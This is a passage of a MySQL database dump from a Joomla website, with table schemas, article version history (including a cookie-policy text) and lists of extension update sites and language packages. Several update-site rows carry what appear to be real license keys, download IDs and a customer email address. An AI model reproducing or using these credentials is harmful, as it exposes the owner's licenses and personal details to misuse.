`core_version` int(10) unsigned NOT NULL DEFAULT 1,
`core_ordering` int(11) NOT NULL DEFAULT 0,
`core_metakey` text DEFAULT NULL,
`core_metadesc` text DEFAULT NULL,
`core_catid` int(10) unsigned NOT NULL DEFAULT 0,
`core_xreference` varchar(50) NOT NULL DEFAULT '' COMMENT 'A reference to enable linkages to external data sets.',
`core_type_id` int(10) unsigned NOT NULL DEFAULT 0,
PRIMARY KEY (`core_content_id`),
KEY `tag_idx` (`core_state`,`core_access`),
KEY `idx_access` (`core_access`),
KEY `idx_language` (`core_language`),
KEY `idx_modified_time` (`core_modified_time`),
KEY `idx_created_time` (`core_created_time`),
KEY `idx_core_modified_user_id` (`core_modified_user_id`),
KEY `idx_core_checked_out_user_id` (`core_checked_out_user_id`),
KEY `idx_core_created_user_id` (`core_created_user_id`),
KEY `idx_core_type_id` (`core_type_id`),
KEY `idx_alias` (`core_alias`(100)),
KEY `idx_title` (`core_title`(100)),
KEY `idx_content_type` (`core_type_alias`(100))
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci COMMENT='Contains core content data in name spaced fields';
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `vzx9b_ucm_content`
--
LOCK TABLES `vzx9b_ucm_content` WRITE;
/*!40000 ALTER TABLE `vzx9b_ucm_content` DISABLE KEYS */;
/*!40000 ALTER TABLE `vzx9b_ucm_content` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `vzx9b_ucm_history`
--
DROP TABLE IF EXISTS `vzx9b_ucm_history`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `vzx9b_ucm_history` (
`version_id` int(10) unsigned NOT NULL AUTO_INCREMENT,
`ucm_item_id` int(10) unsigned NOT NULL,
`ucm_type_id` int(10) unsigned NOT NULL,
`version_note` varchar(255) NOT NULL DEFAULT '' COMMENT 'Optional version name',
`save_date` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
`editor_user_id` int(10) unsigned NOT NULL DEFAULT 0,
`character_count` int(10) unsigned NOT NULL DEFAULT 0 COMMENT 'Number of characters in this version.',
`sha1_hash` varchar(50) NOT NULL DEFAULT '' COMMENT 'SHA1 hash of the version_data column.',
`version_data` longtext NOT NULL COMMENT 'json-encoded string of version data',
`keep_forever` tinyint(4) NOT NULL DEFAULT 0 COMMENT '0=auto delete; 1=keep',
PRIMARY KEY (`version_id`),
KEY `idx_ucm_item_id` (`ucm_type_id`,`ucm_item_id`),
KEY `idx_save_date` (`save_date`)
) ENGINE=InnoDB AUTO_INCREMENT=10 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `vzx9b_ucm_history`
--
LOCK TABLES `vzx9b_ucm_history` WRITE;
/*!40000 ALTER TABLE `vzx9b_ucm_history` DISABLE KEYS */;
INSERT INTO `vzx9b_ucm_history` VALUES (1,19,6,'','2015-02-02 06:05:15',309,580,'8b8b28d0735048ef374cfed409baeca2e9c48a2a','{\"id\":19,\"asset_id\":\"44\",\"parent_id\":\"1\",\"lft\":\"105\",\"rgt\":132,\"level\":1,\"path\":\"sample-data-articles\\/joomla\",\"extension\":\"com_content\",\"title\":\"Joomla!\",\"alias\":\"joomla\",\"note\":\"\",\"description\":\"\",\"published\":\"1\",\"checked_out\":\"864\",\"checked_out_time\":\"2015-02-02 06:05:10\",\"access\":\"1\",\"params\":\"{\\\"category_layout\\\":\\\"\\\",\\\"image\\\":\\\"\\\"}\",\"metadesc\":\"\",\"metakey\":\"\",\"metadata\":\"{\\\"author\\\":\\\"\\\",\\\"robots\\\":\\\"\\\"}\",\"created_user_id\":\"864\",\"created_time\":\"2011-01-01 00:00:01\",\"modified_user_id\":\"864\",\"modified_time\":\"2015-02-02 06:05:15\",\"hits\":\"0\",\"language\":\"*\",\"version\":\"1\"}',0),(2,21,6,'','2015-02-02 06:05:23',309,872,'44c955d32c91be43379e62067ff88355a5e6afd7','{\"id\":21,\"asset_id\":\"46\",\"parent_id\":\"19\",\"lft\":\"130\",\"rgt\":131,\"level\":2,\"path\":\"joomla\\/extensions\\/components\",\"extension\":\"com_content\",\"title\":\"Components\",\"alias\":\"components\",\"note\":\"\",\"description\":\"<p>Components are larger extensions that produce the major content for your site. Each component has one or more \\\"views\\\" that control how content is displayed. In the Joomla administrator there are additional extensions such as Menus, Redirection, and the extension managers.<\\/p>\",\"published\":\"1\",\"checked_out\":\"864\",\"checked_out_time\":\"2015-02-02 06:05:17\",\"access\":\"1\",\"params\":\"{\\\"category_layout\\\":\\\"\\\",\\\"image\\\":\\\"\\\"}\",\"metadesc\":\"\",\"metakey\":\"\",\"metadata\":\"{\\\"author\\\":\\\"\\\",\\\"robots\\\":\\\"\\\"}\",\"created_user_id\":\"864\",\"created_time\":\"2011-01-01 00:00:01\",\"modified_user_id\":\"864\",\"modified_time\":\"2015-02-02 06:05:23\",\"hits\":\"0\",\"language\":\"*\",\"version\":\"1\"}',0),(3,79,6,'','2015-02-02 06:12:46',309,511,'633bb165d3f0f0ffc2722ee67a8a24736aadfb47','{\"id\":79,\"asset_id\":179,\"parent_id\":\"1\",\"lft\":\"91\",\"rgt\":92,\"level\":1,\"path\":null,\"extension\":\"com_content\",\"title\":\"Blog\",\"alias\":\"blog\",\"note\":\"\",\"description\":\"\",\"published\":\"1\",\"checked_out\":null,\"checked_out_time\":null,\"access\":\"1\",\"params\":\"{\\\"category_layout\\\":\\\"\\\",\\\"image\\\":\\\"\\\"}\",\"metadesc\":\"\",\"metakey\":\"\",\"metadata\":\"{\\\"author\\\":\\\"\\\",\\\"robots\\\":\\\"\\\"}\",\"created_user_id\":\"864\",\"created_time\":\"2015-02-02 06:12:46\",\"modified_user_id\":null,\"modified_time\":null,\"hits\":\"0\",\"language\":\"*\",\"version\":null}',0),(4,80,6,'','2015-02-02 18:42:14',309,511,'d9e56992245d6c642c811b6be37a65ad944605d4','{\"id\":80,\"asset_id\":191,\"parent_id\":\"1\",\"lft\":\"93\",\"rgt\":94,\"level\":1,\"path\":null,\"extension\":\"com_content\",\"title\":\"News\",\"alias\":\"news\",\"note\":\"\",\"description\":\"\",\"published\":\"1\",\"checked_out\":null,\"checked_out_time\":null,\"access\":\"1\",\"params\":\"{\\\"category_layout\\\":\\\"\\\",\\\"image\\\":\\\"\\\"}\",\"metadesc\":\"\",\"metakey\":\"\",\"metadata\":\"{\\\"author\\\":\\\"\\\",\\\"robots\\\":\\\"\\\"}\",\"created_user_id\":\"864\",\"created_time\":\"2015-02-02 18:42:14\",\"modified_user_id\":null,\"modified_time\":null,\"hits\":\"0\",\"language\":\"*\",\"version\":null}',0),(5,80,6,'','2015-02-02 18:42:30',309,551,'b0c69f126552d2f470dab4c2637f32d2d55d04ca','{\"id\":80,\"asset_id\":\"191\",\"parent_id\":\"79\",\"lft\":\"92\",\"rgt\":93,\"level\":2,\"path\":\"news\",\"extension\":\"com_content\",\"title\":\"News\",\"alias\":\"news\",\"note\":\"\",\"description\":\"\",\"published\":\"1\",\"checked_out\":\"864\",\"checked_out_time\":\"2015-02-02 18:42:24\",\"access\":\"1\",\"params\":\"{\\\"category_layout\\\":\\\"\\\",\\\"image\\\":\\\"\\\"}\",\"metadesc\":\"\",\"metakey\":\"\",\"metadata\":\"{\\\"author\\\":\\\"\\\",\\\"robots\\\":\\\"\\\"}\",\"created_user_id\":\"864\",\"created_time\":\"2015-02-02 18:42:14\",\"modified_user_id\":\"864\",\"modified_time\":\"2015-02-02 18:42:30\",\"hits\":\"0\",\"language\":\"*\",\"version\":\"1\"}',0),(6,81,6,'','2015-02-02 18:42:46',309,520,'c1186cda9e6fae853472a26d68bc50d2f9af3eef','{\"id\":81,\"asset_id\":192,\"parent_id\":\"79\",\"lft\":\"94\",\"rgt\":95,\"level\":2,\"path\":null,\"extension\":\"com_content\",\"title\":\"Tutorial\",\"alias\":\"tutorial\",\"note\":\"\",\"description\":\"\",\"published\":\"1\",\"checked_out\":null,\"checked_out_time\":null,\"access\":\"1\",\"params\":\"{\\\"category_layout\\\":\\\"\\\",\\\"image\\\":\\\"\\\"}\",\"metadesc\":\"\",\"metakey\":\"\",\"metadata\":\"{\\\"author\\\":\\\"\\\",\\\"robots\\\":\\\"\\\"}\",\"created_user_id\":\"864\",\"created_time\":\"2015-02-02 18:42:46\",\"modified_user_id\":null,\"modified_time\":null,\"hits\":\"0\",\"language\":\"*\",\"version\":null}',0),(7,82,6,'','2015-02-02 18:42:56',309,516,'8433516aea93072c0f29f750669e5b4dfe733e72','{\"id\":82,\"asset_id\":193,\"parent_id\":\"79\",\"lft\":\"96\",\"rgt\":97,\"level\":2,\"path\":null,\"extension\":\"com_content\",\"title\":\"Review\",\"alias\":\"review\",\"note\":\"\",\"description\":\"\",\"published\":\"1\",\"checked_out\":null,\"checked_out_time\":null,\"access\":\"1\",\"params\":\"{\\\"category_layout\\\":\\\"\\\",\\\"image\\\":\\\"\\\"}\",\"metadesc\":\"\",\"metakey\":\"\",\"metadata\":\"{\\\"author\\\":\\\"\\\",\\\"robots\\\":\\\"\\\"}\",\"created_user_id\":\"864\",\"created_time\":\"2015-02-02 18:42:56\",\"modified_user_id\":null,\"modified_time\":null,\"hits\":\"0\",\"language\":\"*\",\"version\":null}',0),(8,83,6,'','2015-02-02 18:43:15',309,518,'c054624137f36fae4f0cc107c6e7caa47aeb8401','{\"id\":83,\"asset_id\":194,\"parent_id\":\"79\",\"lft\":\"98\",\"rgt\":99,\"level\":2,\"path\":null,\"extension\":\"com_content\",\"title\":\"Updates\",\"alias\":\"updates\",\"note\":\"\",\"description\":\"\",\"published\":\"1\",\"checked_out\":null,\"checked_out_time\":null,\"access\":\"1\",\"params\":\"{\\\"category_layout\\\":\\\"\\\",\\\"image\\\":\\\"\\\"}\",\"metadesc\":\"\",\"metakey\":\"\",\"metadata\":\"{\\\"author\\\":\\\"\\\",\\\"robots\\\":\\\"\\\"}\",\"created_user_id\":\"864\",\"created_time\":\"2015-02-02 18:43:15\",\"modified_user_id\":null,\"modified_time\":null,\"hits\":\"0\",\"language\":\"*\",\"version\":null}',0),(9,68,1,'','2021-06-01 10:44:55',309,6355,'ddc17ff396f97621a53f7e64e509ae0634167efb','{\"id\":68,\"asset_id\":244,\"title\":\"Site Cookie Policy\",\"alias\":\"site-cookie-policy\",\"introtext\":\"<p>Welcome to our cookie policy. This policy works alongside our\\u00a0<a href=\\\"privacy-policy\\\" target=\\\"_blank\\\" rel=\\\"noopener noreferrer\\\">Privacy Policy<\\/a>. The purpose of this policy is to describe what cookies are, what we use them for, and how you can manage them during your visit to or use of our website.<\\/p>\\r\\n<p><strong>What are cookies?<\\/strong><\\/p>\\r\\n<p>We may place small text files called \\u2018cookies\\u2019 on your device when you visit our website. These files do not contain personal data, but they do contain a personal identifier allowing us to associate your personal data with a certain device. Many websites use cookies and you can find out more about them at\\u00a0<a href=\\\"http:\\/\\/www.allaboutcookies.org\\\" target=\\\"_blank\\\" rel=\\\"noopener noreferrer\\\">All About Cookies<\\/a>.<\\/p>\\r\\n<h2><strong>Why do we use cookies?<\\/strong><\\/h2>\\r\\n<p>These files serve several useful purposes for you, including:<\\/p>\\r\\n<ul>\\r\\n<li>granting you access to restricted content;<\\/li>\\r\\n<li>tailoring our website\\u2019s functionality to you personally by letting us remember your preferences, location or device type;<\\/li>\\r\\n<li>improving how our website performs;<\\/li>\\r\\n<li>understanding who our audience is so that we can provide content most relevant to you;<\\/li>\\r\\n<li>allowing third parties to provide services to our website; and<\\/li>\\r\\n<li>helping us deliver interest-based advertising where appropriate in compliance with the applicable laws.<\\/li>\\r\\n<\\/ul>\\r\\n<h2><strong>The types of cookies we use<\\/strong><\\/h2>\\r\\n<p>We use different types of cookies on our website. Some of these cookies are placed by us, while others are placed by our third-party plug-ins, suppliers or advertisers. These cookies may be deleted from your device at different times, such as at the end of your browsing session (when you leave the website) or after a pre-set amount of time, or they may persist on your device until you delete them.<\\/p>\\r\\n<p>We use the following types of cookies on our website:<\\/p>\\r\\n<ul>\\r\\n<li>essential cookies\\u00a0\\u2013 these are cookies that allow our website to perform its essential functions. Without these cookies, some parts of our websites would stop working.<\\/li>\\r\\n<li>site analytics cookies\\u00a0\\u2013 these are cookies that monitor how our website is performing, and how you interact with it. We use them to know how best to improve our website or services.<\\/li>\\r\\n<li>functional cookies\\u00a0\\u2013 these are cookies that remember who you are as a user of our website. We use them to remember any preferences you may have selected on our website, like saving your username and password or settings.<\\/li>\\r\\n<\\/ul>\\r\\n<h2><strong>Our cookies<\\/strong><\\/h2>\\r\\n<p>Essential: Allows our website to perform its essential functions. Without these cookies, some parts of our websites would stop working.<\\/p>\\r\\n<p>Site Analytics: Monitors how our website is performing, and how you interact with it. We use them to know how best to improve our website or services.<\\/p>\\r\\n<p>Functional: Remembers who you are as a user of our website. We use them to remember any preferences you may have selected on our website, like saving your username and password or settings.<\\/p>\\r\\n<h2><strong>Deleting cookies<\\/strong><\\/h2>\\r\\n<p>Your internet browser generally accepts cookies automatically, but you can often change this setting to stop accepting them. You can also delete cookies manually. You can read how to do this at\\u00a0<a href=\\\"https:\\/\\/www.digitaltrends.com\\/computing\\/how-to-delete-cookies\\/\\\" target=\\\"_blank\\\" rel=\\\"noopener noreferrer\\\">Digital Trends<\\/a>.<\\/p>\\r\\n<p>Deleting or no longer accepting cookies may prevent you from accessing certain aspects of our website where cookies are necessary or because the website forgot your preferences.\\u00a0 <\\/p>\\r\\n<h2><strong>Updates to this policy<\\/strong><\\/h2>\\r\\n<p style=\\\"color: #0e101a; background: transparent; margin-top: 0pt; margin-bottom: 0pt;\\\">We may occasionally make changes to this policy. When we make material changes to this policy, we will provide you with a prominent notice on our website or send you an email. We may notify you in advance. <span style=\\\"color: #0e101a; background: transparent; margin-top: 0pt; margin-bottom: 0pt;\\\" data-preserver-spaces=\\\"true\\\"><br \\/><\\/span><\\/p>\",\"fulltext\":\"\",\"state\":1,\"catid\":null,\"created\":\"2021-06-01 10:44:55\",\"created_by\":\"309\",\"created_by_alias\":\"\",\"modified\":\"2021-06-01 10:44:55\",\"modified_by\":null,\"checked_out\":null,\"checked_out_time\":null,\"publish_up\":\"2021-06-01 10:44:55\",\"publish_down\":\"0000-00-00 00:00:00\",\"images\":\"{\\\"image_intro\\\":\\\"\\\",\\\"float_intro\\\":\\\"\\\",\\\"image_intro_alt\\\":\\\"\\\",\\\"image_intro_caption\\\":\\\"\\\",\\\"image_fulltext\\\":\\\"\\\",\\\"float_fulltext\\\":\\\"\\\",\\\"image_fulltext_alt\\\":\\\"\\\",\\\"image_fulltext_caption\\\":\\\"\\\"}\",\"urls\":\"{\\\"urla\\\":false,\\\"urlatext\\\":\\\"\\\",\\\"targeta\\\":\\\"\\\",\\\"urlb\\\":false,\\\"urlbtext\\\":\\\"\\\",\\\"targetb\\\":\\\"\\\",\\\"urlc\\\":false,\\\"urlctext\\\":\\\"\\\",\\\"targetc\\\":\\\"\\\"}\",\"attribs\":\"{\\\"article_layout\\\":\\\"\\\",\\\"show_title\\\":\\\"\\\",\\\"link_titles\\\":\\\"\\\",\\\"show_tags\\\":\\\"\\\",\\\"show_intro\\\":\\\"\\\",\\\"info_block_position\\\":\\\"\\\",\\\"info_block_show_title\\\":\\\"\\\",\\\"show_category\\\":\\\"\\\",\\\"link_category\\\":\\\"\\\",\\\"show_parent_category\\\":\\\"\\\",\\\"link_parent_category\\\":\\\"\\\",\\\"show_associations\\\":\\\"\\\",\\\"show_author\\\":\\\"\\\",\\\"link_author\\\":\\\"\\\",\\\"show_create_date\\\":\\\"\\\",\\\"show_modify_date\\\":\\\"\\\",\\\"show_publish_date\\\":\\\"\\\",\\\"show_item_navigation\\\":\\\"\\\",\\\"show_icons\\\":\\\"\\\",\\\"show_print_icon\\\":\\\"\\\",\\\"show_email_icon\\\":\\\"\\\",\\\"show_vote\\\":\\\"\\\",\\\"show_hits\\\":\\\"\\\",\\\"show_noauth\\\":\\\"\\\",\\\"urls_position\\\":\\\"\\\",\\\"alternative_readmore\\\":\\\"\\\",\\\"article_page_title\\\":\\\"\\\",\\\"show_publishing_options\\\":\\\"\\\",\\\"show_article_options\\\":\\\"\\\",\\\"show_urls_images_backend\\\":\\\"\\\",\\\"show_urls_images_frontend\\\":\\\"\\\",\\\"spfeatured_image\\\":\\\"\\\",\\\"spfeatured_image_alt\\\":\\\"\\\",\\\"post_format\\\":\\\"standard\\\",\\\"gallery\\\":\\\"\\\",\\\"audio\\\":\\\"\\\",\\\"video\\\":\\\"\\\",\\\"link_title\\\":\\\"\\\",\\\"link_url\\\":\\\"\\\",\\\"quote_text\\\":\\\"\\\",\\\"quote_author\\\":\\\"\\\",\\\"post_status\\\":\\\"\\\"}\",\"version\":1,\"ordering\":null,\"metakey\":\"\",\"metadesc\":\"\",\"access\":\"1\",\"hits\":null,\"metadata\":\"{\\\"robots\\\":\\\"\\\",\\\"author\\\":\\\"\\\",\\\"rights\\\":\\\"\\\",\\\"xreference\\\":\\\"\\\"}\",\"featured\":\"0\",\"language\":\"*\",\"xreference\":\"\",\"note\":\"\"}',0);
/*!40000 ALTER TABLE `vzx9b_ucm_history` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `vzx9b_update_sites`
--
DROP TABLE IF EXISTS `vzx9b_update_sites`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `vzx9b_update_sites` (
`update_site_id` int(11) NOT NULL AUTO_INCREMENT,
`name` varchar(100) DEFAULT '',
`type` varchar(20) DEFAULT '',
`location` mediumtext NOT NULL,
`enabled` int(11) DEFAULT 0,
`last_check_timestamp` bigint(20) DEFAULT 0,
`extra_query` varchar(1000) DEFAULT '',
PRIMARY KEY (`update_site_id`)
) ENGINE=InnoDB AUTO_INCREMENT=69 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci COMMENT='Update Sites';
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `vzx9b_update_sites`
--
LOCK TABLES `vzx9b_update_sites` WRITE;
/*!40000 ALTER TABLE `vzx9b_update_sites` DISABLE KEYS */;
INSERT INTO `vzx9b_update_sites` VALUES (1,'Joomla! Core','collection','https://update.joomla.org/core/list.xml',1,1668973261,''),(3,'Accredited Joomla! Translations','collection','https://update.joomla.org/language/translationlist_3.xml',1,1656420847,''),(4,'Joomla! Update Component Update Site','extension','https://update.joomla.org/core/extensions/com_joomlaupdate.xml',1,1656420847,''),(10,'Helix3 - Ajax','extension','http://www.joomshaper.com/updates/plg-ajax-helix3.xml',1,1656420847,''),(11,'System - Helix3 Framework','extension','http://www.joomshaper.com/updates/plg-system-helix3.xml',1,1656420848,''),(13,'shaper_helix3','extension','http://www.joomshaper.com/updates/shaper-helix3.xml',1,1656420848,''),(16,'shaper_helix3','extension','https://www.joomshaper.com/updates/shaper-helix3.xml',1,1656420848,''),(17,'SP Page Builder','extension','http://www.joomshaper.com/updates/com-sp-page-builder-pro.xml',1,1656420848,'joomshaper_email=bevan%40crashtackle.co.za&joomshaper_license_key=58b5b1e44ceef4c6244f86bb8d812b53'),(18,'WebInstaller Update Site','extension','http://appscdn.joomla.org/webapps/jedapps/webinstaller.xml',1,1656420849,''),(26,'Image Recycle Updates','extension','https://www.imagerecycle.com/joomla_extension.xml',1,1656420849,''),(29,'News Show Pro GK5 Updates','extension','https://www.gavick.com/update_server/joomla30/nsp_gk5.xml',1,1656420849,''),(30,'DJ-ImageSlider Package','extension','http://dj-extensions.com/updates/djimageslider.xml',1,1656420850,''),(32,'Regular Labs - Snippets','extension','https://download.regularlabs.com/updates.xml?e=snippets&type=.xml',1,1656420850,''),(34,'SP Page Builder','extension','https://www.joomshaper.com/updates/com-sp-page-builder-pro.xml',1,1656420850,'joomshaper_email=bevan%40crashtackle.co.za&joomshaper_license_key=58b5b1e44ceef4c6244f86bb8d812b53'),(37,'sysbreezingforms','extension','https://crosstec.org/updates/breezingforms/sysbreezingforms_update.xml',1,1656420850,''),(38,'WebInstaller Update Site','extension','https://appscdn.joomla.org/webapps/jedapps/webinstaller.xml',1,1656420851,''),(51,'Akeeba Backup Professional','extension','https://cdn.akeebabackup.com/updates/pkgakeebapro.xml',1,1656420851,'dlid=e71ed15695d9335d00057d6681477e90'),(53,'Admin Tools Professional','extension','https://cdn.akeebabackup.com/updates/pkgadmintoolspro.xml',1,1656420851,'dlid=e71ed15695d9335d00057d6681477e90'),(55,'Akeeba FEF','extension','http://cdn.akeebabackup.com/updates/fef.xml',1,1656420851,''),(61,'FOF 3.x','extension','http://cdn.akeebabackup.com/updates/fof3_file.xml',1,1656420851,''),(62,'JSitemap Professional Update Server','extension','http://storejextensions.org/updates/jsitemap_updater.xml',1,1656420851,''),(63,'Google TagManager Updates','extension','http://toolsforjoomla.com/index.php?option=com_ars&view=update&task=stream&format=xml&id=2',1,1656420852,''),(64,'BreezingForms Pro','extension','https://crosstec.org/updates/breezingforms/breezingforms_update2.xml',1,1656420852,'key=0-91761f6ef2ab7b795db68a7bd5c9aa8f'),(65,'FOF 3.x','extension','http://cdn.akeeba.com/updates/fof3_file.xml',1,1656420852,''),(68,'reDim-Service-Update','extension','https://www.redim.de/jupdates/cookiehint.xml',1,1656420855,'');
/*!40000 ALTER TABLE `vzx9b_update_sites` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `vzx9b_update_sites_extensions`
--
DROP TABLE IF EXISTS `vzx9b_update_sites_extensions`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `vzx9b_update_sites_extensions` (
`update_site_id` int(11) NOT NULL DEFAULT 0,
`extension_id` int(11) NOT NULL DEFAULT 0,
PRIMARY KEY (`update_site_id`,`extension_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci COMMENT='Links extensions to update sites';
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `vzx9b_update_sites_extensions`
--
LOCK TABLES `vzx9b_update_sites_extensions` WRITE;
/*!40000 ALTER TABLE `vzx9b_update_sites_extensions` DISABLE KEYS */;
INSERT INTO `vzx9b_update_sites_extensions` VALUES (1,700),(3,802),(4,28),(5,10002),(6,10004),(7,10001),(8,10003),(10,10001),(11,10002),(12,10004),(13,10003),(16,10003),(17,10004),(18,10011),(26,10031),(29,10037),(30,10040),(32,10045),(32,10047),(34,10004),(37,10060),(38,10011),(43,10004),(47,10004),(48,10004),(51,10018),(53,10033),(55,10080),(61,10092),(62,10095),(63,10100),(64,10048),(65,10092),(68,10107);
/*!40000 ALTER TABLE `vzx9b_update_sites_extensions` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `vzx9b_updates`
--
DROP TABLE IF EXISTS `vzx9b_updates`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `vzx9b_updates` (
`update_id` int(11) NOT NULL AUTO_INCREMENT,
`update_site_id` int(11) DEFAULT 0,
`extension_id` int(11) DEFAULT 0,
`name` varchar(100) DEFAULT '',
`description` mediumtext NOT NULL,
`element` varchar(100) DEFAULT '',
`type` varchar(20) DEFAULT '',
`folder` varchar(20) DEFAULT '',
`client_id` tinyint(3) DEFAULT 0,
`version` varchar(32) DEFAULT '',
`data` mediumtext NOT NULL,
`detailsurl` mediumtext NOT NULL,
`infourl` mediumtext NOT NULL,
`extra_query` varchar(1000) DEFAULT '',
PRIMARY KEY (`update_id`)
) ENGINE=InnoDB AUTO_INCREMENT=3306 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci COMMENT='Available Updates';
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `vzx9b_updates`
--
LOCK TABLES `vzx9b_updates` WRITE;
/*!40000 ALTER TABLE `vzx9b_updates` DISABLE KEYS */;
INSERT INTO `vzx9b_updates` VALUES (2847,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(2848,3,0,'Albanian','','pkg_sq-AL','package','',0,'3.1.1.2','','https://update.joomla.org/language/details3/sq-AL_details.xml','',''),(2849,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(2850,3,0,'Armenian','','pkg_hy-AM','package','',0,'3.4.4.1','','https://update.joomla.org/language/details3/hy-AM_details.xml','',''),(2851,3,0,'Basque','','pkg_eu-ES','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/eu-ES_details.xml','',''),(2852,3,0,'Belarusian','','pkg_be-BY','package','',0,'3.2.1.2','','https://update.joomla.org/language/details3/be-BY_details.xml','',''),(2853,3,0,'Bengali, Bangladesh','','pkg_bn-BD','package','',0,'3.8.10.1','','https://update.joomla.org/language/details3/bn-BD_details.xml','',''),(2854,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(2855,3,0,'Bulgarian','','pkg_bg-BG','package','',0,'3.6.5.2','','https://update.joomla.org/language/details3/bg-BG_details.xml','',''),(2856,3,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(2857,3,0,'Chinese, Simplified','','pkg_zh-CN','package','',0,'3.10.6.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(2858,3,0,'Chinese, Traditional','','pkg_zh-TW','package','',0,'3.8.0.1','','https://update.joomla.org/language/details3/zh-TW_details.xml','',''),(2859,3,0,'Croatian','','pkg_hr-HR','package','',0,'3.10.9.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(2860,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.10.8.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(2861,3,0,'Danish','','pkg_da-DK','package','',0,'3.10.10.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(2862,3,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(2863,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.10.10.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(2864,3,0,'Dzongkha','','pkg_dz-BT','package','',0,'3.6.2.1','','https://update.joomla.org/language/details3/dz-BT_details.xml','',''),(2865,3,0,'English, Australia','','pkg_en-AU','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(2866,3,0,'English, Canada','','pkg_en-CA','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(2867,3,0,'English, New Zealand','','pkg_en-NZ','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(2868,3,0,'English, USA','','pkg_en-US','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(2869,3,0,'Esperanto','','pkg_eo-XX','package','',0,'3.8.11.1','','https://update.joomla.org/language/details3/eo-XX_details.xml','',''),(2870,3,0,'Estonian','','pkg_et-EE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(2871,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(2872,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.10.10.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(2873,3,0,'French','','pkg_fr-FR','package','',0,'3.10.10.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(2874,3,0,'French, Canada','','pkg_fr-CA','package','',0,'3.6.5.1','','https://update.joomla.org/language/details3/fr-CA_details.xml','',''),(2875,3,0,'Galician','','pkg_gl-ES','package','',0,'3.3.1.2','','https://update.joomla.org/language/details3/gl-ES_details.xml','',''),(2876,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.10.10.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(2877,3,0,'German','','pkg_de-DE','package','',0,'3.10.10.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(2878,3,0,'German, Austria','','pkg_de-AT','package','',0,'3.10.10.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(2879,3,0,'German, Liechtenstein','','pkg_de-LI','package','',0,'3.10.10.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(2880,3,0,'German, Luxembourg','','pkg_de-LU','package','',0,'3.10.10.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(2881,3,0,'German, Switzerland','','pkg_de-CH','package','',0,'3.10.10.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(2882,3,0,'Greek','','pkg_el-GR','package','',0,'3.10.10.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(2883,3,0,'Hebrew','','pkg_he-IL','package','',0,'3.1.1.2','','https://update.joomla.org/language/details3/he-IL_details.xml','',''),(2884,3,0,'Hindi, India','','pkg_hi-IN','package','',0,'3.3.6.2','','https://update.joomla.org/language/details3/hi-IN_details.xml','',''),(2885,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.10.10.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(2886,3,0,'Indonesian, Bahasa 